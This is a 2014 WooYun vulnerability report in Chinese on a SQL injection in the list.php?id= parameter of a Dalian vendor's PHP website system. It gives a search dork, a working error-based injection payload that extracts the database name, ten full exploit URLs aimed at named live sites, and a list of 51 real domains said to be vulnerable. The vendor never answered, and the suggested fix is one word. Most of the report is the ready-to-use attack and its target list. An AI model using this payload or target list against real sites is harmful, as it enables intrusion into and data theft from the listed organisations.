漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-083434
漏洞标题:某php系统通用注入(影响较多企业)
相关厂商:合众商道(大连)科技有限公司
漏洞作者: 郭斯特
提交时间:2014-11-18 11:26
修复时间:2015-02-16 11:28
公开时间:2015-02-16 11:28
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-02-16: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT~
支持联合查询~
详细说明:
技术支持:合众商道(大连)科技有限公司inurl:list.php?id=
id=参数木有过滤
exp:list.php?id=2 AND (SELECT 5351 FROM(SELECT COUNT(*),CONCAT(0x5c
,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
漏洞证明:
http://dlmct.com//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://china-ymf.com//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://www.yxohq.com//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://yfgl.cn//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://bld-pcb.com//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://www.cnjizhuangdai.com//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://www.p-yuan.com//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://dlshs.cn//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://dlbaoxiang.cn//list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
http://xhmold.com.cn/list.php?id=2%20AND%20(SELECT%205351%20FROM(SELECT%20COUNT(*),CONCAT(0x5c,(MID((IFNULL(CAST(DATABASE()%20AS%20CHAR),0x20)),1,50)),0x5c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
1. dldjsb.cn
2. www.wfdxh.cn
3. arc.net.cn
4. xhmold.com.cn
5. www.lengbingqi.com
6. dlyuhe.com.cn
7. www.dlxz.cn
8. dlyumex.com.cn
9. www.kuoshen.net
10. dlbaoxiang.cn11. hkyeya.cn
12. dlshs.cn
13. dlnc.cn
14. dlhailin.com
15. www.peanutschina.com
16. www.dlxiehe.cn
17. www.p-yuan.com
18. liquorstore.com.cn
19. cn-dhhd.com
20. www.runfine.cn
21. daliansy.com
22. www.bld-pcb.com
23. yfgl.cn
24. woodsh.cn
25. dl-ht.cn
26. www.specialsteels.cn
27. www.mst-dl.cn
28. catlitter.com.cn
29. zyjc1018.com
30. www.dl-dishui.com
31. china-ymf.com
32. xtsc.cn
33. bld-pcb.com
34. dlzxhg.cn
35. en.cmmsn.net
36. dlmct.com
37. dlxz.cn38. ytcx.com.cn
39. runfine.cn
40. www.xinyida.cc
41. www.dltcnet.com
42. dl-jd.com
43. www.zk-dl.com
44. www.yxohq.com
45. www.fdlc.net
46. cmmsn.net
47. www.cnjizhuangdai.com
48. dlszport.com
49. www.dlsanxie.com
50. cnjizhuangdai.com
51. dlhanfeng.com
修复方案:
过滤
版权声明:转载请注明来源 郭斯特@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝